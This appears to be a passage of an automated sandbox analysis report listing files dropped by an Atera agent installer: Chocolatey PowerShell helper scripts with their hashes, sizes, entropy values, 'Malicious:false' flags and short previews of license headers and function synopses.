                                                                                                                                                                                                                                                                                              SHA-512:FC567A01086E8E6A55AAD1E3AEA0E9639E2F8C03399728A5421214E1E0CBF726A7D0F7422EBE3CE74C226F27C11C051760CDAD2AFBB5E69294152669929AB05A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyUnzip {..<#...SYNOPSIS..Unzips an archive file and returns the location for further processing......DESCRIPTION..This unzips files using the 7-zip command line tool 7z.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16502
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.146477219224201
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHpWybOWetWKW3VjEve49W9cO1kazvJwKEDbrj:ctL+QGPnetZ2EvXOlybrj
                                                                                                                                                                                                                                                                                              MD5:CD302EF4E080D330A9DEAFA584C049AB
                                                                                                                                                                                                                                                                                              SHA1:53B98CD3540A35FF32E1E6DDA2BB3F786FAE23ED
                                                                                                                                                                                                                                                                                              SHA-256:3E18EB6CF646474E9259E932679E04DF1CC4322E2E354A770F32A0F7D67C72A4
                                                                                                                                                                                                                                                                                              SHA-512:B0D74A92DFB16CBE799C781CAD2702C6932BA5B15A28EE5AF2FB56A4CFA4317B2347AF227A9484A0536CC95674CFBB89343E3955C2457AFD0D23854963D85BFC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyWebFile {..<#...SYNOPSIS..Downloads a file from the internets......DESCRIPTION..This will download a file from a url, tracking with a progress bar...It returns the file

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4123
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.288017280806032
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKotzWfp1Vr4MeAWMK13MqhPTv6ee5:cSyL+QGXH3Gp1VrSAQ3Mqg
                                                                                                                                                                                                                                                                                              MD5:E564E914B196DAC040D08110D5D8718D
                                                                                                                                                                                                                                                                                              SHA1:2532E9010D3A67A6FF345F2564A843800DC59CBB
                                                                                                                                                                                                                                                                                              SHA-256:5AF7D3DC6B44142492B9E31A69352873D43D570D7D4718B2942A67D3D6180951
                                                                                                                                                                                                                                                                                              SHA-512:06127E83C2BBDA160183D3DC5E51E652E2011C760B561DA639BDF847F085DB3E93E3C5F0B5C12C1114D228C3882E0FBC81418CF9CAA3C04FA837CE0A68574EFF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariable {..<#...SYNOPSIS..Gets an Environment Variable......DESCRIPTION..This will will get an environment variable based on the variable name..and scope while accoun

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2060
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.165746374691896
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMfcM1KIcoCtJS0RjhYigLiO:cSyL+4pGXHFKovCZWdQ
                                                                                                                                                                                                                                                                                              MD5:D4DF76AC88518CA76BD5EC4605C55781
                                                                                                                                                                                                                                                                                              SHA1:8B540089E4B1AF183CF9D8053043BD4252A8B2BB
                                                                                                                                                                                                                                                                                              SHA-256:F73E30026DC59EF1B1375FE869347BAE2E02BDC51117E17DD2717E7DE7F712F6
                                                                                                                                                                                                                                                                                              SHA-512:BC37855DDEEF6BD3BECA66109F3EBE09B82409DD8EB1B6DEFC1ADCCEA397356FB521BC22CA8B7D34A418EB6EAAC1E9B277CBD333251A149C46E104980FBF3071
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariableNames([System.EnvironmentVariableTarget] $Scope) {..<#...SYNOPSIS..Gets all environment variable names......DESCRIPTION..Provides a list of environment variabl

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-FtpFile.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7947
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.051645140778019
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:3SfwB1bbVPeBlvvJ5nli61sre8+007Oc+pbkmzqMd0yiW:3SfwHBgPd04OHpb3yW
                                                                                                                                                                                                                                                                                              MD5:15DDE6C604B0BD3A0C1F569BAAC9B91B
                                                                                                                                                                                                                                                                                              SHA1:9366C80608BB20A9CFD84AD574D561E481F9B0B8
                                                                                                                                                                                                                                                                                              SHA-256:12FA2C7D770F0AF308D535A3523903F730A2121B2C72D05A9EA7BF9E5AA27C72
                                                                                                                                                                                                                                                                                              SHA-512:B2DFDC3BC98ADE4486A0CC30E3124F16F9788D6DD8214DF4C6460FE818CFC645EF36FAF03AC99490D0BFEA6A0FDA8646845E9A23C464B13C486E8C8677913339
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.## Get-FtpFile..##############################################################################################################..## Downloads a file from ftp..## Some code from http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell..## Additional functionality emulated from http://poshcode.org/417 (Get-WebFile)..## Written by Stephen C. Austin, Pwnt & Co. http://pwnt.co..##############################################################################################################..## Additional functionality added by Chocolatey Team / Chocolatey Contributors..## - Proxy..## - Better error handling..## - Inline documentation..## - Cmdlet conversion..## - Closing request/response and cleanup..## - Request / ReadWriteResponse Timeouts..##############################################################################################################..function Get-FtpFile {..<#...SYNOPSIS..Downloads a file from a File Transfter Protocol (FTP) l

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-OSArchitectureWidth.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2930
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.220783998189862
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMBigsroWdBWuzonabOsEahaqTtYkkdrO57XMp0o3jMoF7d3:cSyL+4pGXHFKoySxwn0zhaqT6r8Bo3j9
                                                                                                                                                                                                                                                                                              MD5:5CE49B0DAF505DBCDA1D6E3B21FCCE88
                                                                                                                                                                                                                                                                                              SHA1:68B5493F4C79FA198269A211B4B3A981FE06CEBA
                                                                                                                                                                                                                                                                                              SHA-256:94DC6FBE584FE5DA6333E44F4F0EFA88254A7F78EAC1DE593683A50F33EECD96
                                                                                                                                                                                                                                                                                              SHA-512:580AF8026407DC485BDFBDED106CF3DFD778A900504BF5A66AE1B14C9A1A7F1F80E7E888A26B42446091D40B61E4F3250E3D1CBD661C3557B05A3275E9522545
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-OSArchitectureWidth {..<#...SYNOPSIS..Get the operating system architecture address width......DESCRIPTION..This will return the system architecture address width (probably 32 or

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-PackageParameters.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7233
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.212503071724739
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyhrzQGXHHyN604JEtV/OyU/rFPV/LA+N/IwX/G3:cthrzQGA4JEArFPZLAkIwX8
                                                                                                                                                                                                                                                                                              MD5:5CB5EC1EFD682DB6B436388E63841227
                                                                                                                                                                                                                                                                                              SHA1:15234AFA9F45671CC89DF05DF9371F125213F5CE
                                                                                                                                                                                                                                                                                              SHA-256:F34917832A7347060BC1B8DCDD05FD4E5AA1672DBFA6A81DBABE9A978AD4B3A2
                                                                                                                                                                                                                                                                                              SHA-512:9E7D279B3CF9D737F2D114085FCBBD6AD13F681BF1365109AD20D9998EF20EA28E7703337E12BA5F350BE4CC37B35E5C7A7ED57FF45896D40B3F628672ED2096
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2016 - 2017 Original authors from https://github.com/chocolatey/chocolatey-coreteampackages..# Copyright . 2016 Miodrag Mili. - https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# special thanks to the Core Community Maintainers team and their work..# on the Get-PackageParameters function that is in the..# `chocolatey-core.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ToolsLocation.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3761
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.908858016895155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyp4pGXHFKo/jFKv+Q/IT00CSZL5eFYE/:cSypQGXHNRKvGT06L5eFYk
                                                                                                                                                                                                                                                                                              MD5:D248C571C9B745CD77B6FF016245AFDA
                                                                                                                                                                                                                                                                                              SHA1:476E0532FA0972690A43C1227C1E50FED6916064
                                                                                                                                                                                                                                                                                              SHA-256:64CA4E5DF3587448659E052FACF69D47DAB48845929A1D21C386812DEE25285D
                                                                                                                                                                                                                                                                                              SHA-512:114DF561CFD26AEB535B7804AE5C978F1850EA07F609C502BC745683229E06FB7AD76F04F610CC2A2CE4890FCAFC089202BD96BCA146745CCC6226E0FD63C91E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ToolsLocation {..<#...SYNOPSIS..Gets the top level location for tools/software installed outside of..package folders......DESCRIPTION..Creates or uses an environment variable that a user can control to..communicate with packages about where they would like software that is..not installed through native installer

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UACEnabled.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1891
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216117200464903
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMo/f0n9WZH78+0tJwHKlkn:cSyL+4pGXHFKozeM6+0kHEkn
                                                                                                                                                                                                                                                                                              MD5:D7810321DDE3F67CCD37E6280D9FC5EA
                                                                                                                                                                                                                                                                                              SHA1:052053BEE38A1F79785B40290CC872E4540D6331
                                                                                                                                                                                                                                                                                              SHA-256:AC936BF04E1890321EEFC321A82F353BECA22633EB0F72DC497F8CF5F45EC99C
                                                                                                                                                                                                                                                                                              SHA-512:F365E429C4D013D8C0394575FBEC031AFD03991FC8019860795EC3D8DD7CAB8D43C539FCAED0A04C5C6979E5046166CAD5E2F8D6A3CD5688D78AB17411C0BEDE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UACEnabled {..<#...SYNOPSIS..Determines if UAC (User Account Control) is turned on or off......DESCRIPTION..This is a low level function used by Chocolatey to decide whether..pro

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UninstallRegistryKey.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6009
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183782879831246
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyp4aXHFKo+l0Y9WqbUqcN1bLZAiwSVg2SHBjqmnn3seTIIe8bMH/g4F267rTli:cSypHXHyJvIXN1miVVoTIyJ6rT25
                                                                                                                                                                                                                                                                                              MD5:8BDD492FD645ABC85E1A76BFB3BB9306
                                                                                                                                                                                                                                                                                              SHA1:0B84BACF023719AAF1F52544FDA4B1542E3FBD5D
                                                                                                                                                                                                                                                                                              SHA-256:2F11852DCC6C4C45BAA7355A5ABA501846A96DA75B0332A5347D382D876F94C8
                                                                                                                                                                                                                                                                                              SHA-512:D9B1E7457B71F0DD930C7DD10076FCCB75E2F6AE6E7129FC417F629DE63C34B8448D7F52D733B476BBAC39C2A758444F462CA8839987C6E3C178C592F6212EEB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UninstallRegistryKey {..<#...SYNOPSIS..Retrieve registry key(s) for system-installed applications from an..exact or wildcard search......DESCRIPTION..This function will attempt to retrieve a matching registry key for an..already installed application, usually to be used with a..chocolateyUninstall.ps1 automatio

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-VirusCheckValid.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1815
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.188333753523367
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSy93R2O+4Ipg8AQyU0E+SlHQk1GpsLA9NIrd+aL85TiV+hT0hCmTxGz1echWtLt:cSyL+4pe90AlH31KoMCoaYp4AmVMMth
                                                                                                                                                                                                                                                                                              MD5:FE5456E477F7D5131DD448942A3AD961
                                                                                                                                                                                                                                                                                              SHA1:C8FDE141D6D5E6713A13C2A6DF55A07E2BB187E5
                                                                                                                                                                                                                                                                                              SHA-256:88D9BA7C04A62D34EDB6A913CE00463FBDC82A2986AC9F459E04B75BC1728922
                                                                                                                                                                                                                                                                                              SHA-512:261AA5F14F8A98638869A509844ECDEE1286B97B131D89A3B901AC2B40F09066CBC1C073D32DDE3EA160FB2C2F971BA0D6785981C6C180BEC5DC4F0D6029421E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-VirusCheckValid {..<#...SYNOPSIS..Used in Pro/Business editions. Runtime virus check against downloaded..resources......DESCRIPTION..Run a runtime malware check against downloade

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFile.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12827
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.065872919066253
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:eBbyvHpL71ZxDlVWfYuuiy5nevc/n30zrryM3zE2LoQY+VUqZA:eBgptZxOQt10zrryMFLdYWU6A
                                                                                                                                                                                                                                                                                              MD5:76013037F6A0E623C39D9D07C20D3BAE
                                                                                                                                                                                                                                                                                              SHA1:7DC87082B4D2AB36AB08D6826CA209E2CD7C5694
                                                                                                                                                                                                                                                                                              SHA-256:8FCCA5AA5F0F631FBE9D319EB13C5A282F5DBC1D8D4BC0852021BE0524A6DD39
                                                                                                                                                                                                                                                                                              SHA-512:9D92B42EEBEE276522103D23EF646DFEC32630E97673B816F51841948C6DD9DA89A89B897D515CFFECED7D14174EF83110FFA4B0BA9F64E1738F083592E696F0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# http://poshcode.org/417..## Get-WebFile (aka wget for PowerShell)..##############################################################################################################..## Downloads a file or page from the web..## History:..## v3.6 - Add -Passthru switch to output TEXT files..## v3.5 - Add -Quiet switch to turn off the progress reports .....## v3.4 - Add progress report for files which don't report size..## v3.3 - Add progress report for files which report their size..## v3.2 - Use the pure Stream object because StreamWriter is based on TextWriter:..## it was messing up binary files, and making mistakes with extended characters in text..## v3.1 - Unwrap the filename when it has quotes around it..## v3 - rewritten completely using HttpWebRequest + HttpWebResponse to figure out the file name, if possible..## v2 - adds a ton of parsing to make the output pretty..## added measuring the scripts involved in the command, (uses Tokenizer)..#####################

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFileName.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9247
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.07010917787166
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSypQGXHQybOdQVeBAmZZ8mumtrUy5nF2wnK0u/obu5OyDucYhr:ctpQG3G1vPS0uQZ2uH
                                                                                                                                                                                                                                                                                              MD5:CCEF9317BA6E4AD2C5F9ADA169DE64E3
                                                                                                                                                                                                                                                                                              SHA1:0B03F562CC75CDFB7CC184DA8B8E6BA73A6256A7
                                                                                                                                                                                                                                                                                              SHA-256:1D10AEC25CE4A010B338041862F485BDA47494A3A0EE154BBA49F48BCFCF0D68
                                                                                                                                                                                                                                                                                              SHA-512:922BCEFDCC76A32EE81AB0610BA1E256A228075084DE5A85F11D3B67D62F496A86BD59BE3AA5E00EC24E5A2805AD4199D5D38CD05D92D1BBC43F333FBE924D30
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License...#..# Based on http://stackoverflow.com/a/13571471/18475....function Get-WebFileName {..<#...SYNOPSIS..Gets the original file name from a url. Used by Get-WebFile to determine..the original file name for a file......DESCRIPTION..Uses several techniques to determine the original file name of the file..based on the url for the fi

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebHeaders.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):5960
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.140316008573171
                                                                                                                                                                                                                                                                                              Encrypted:false
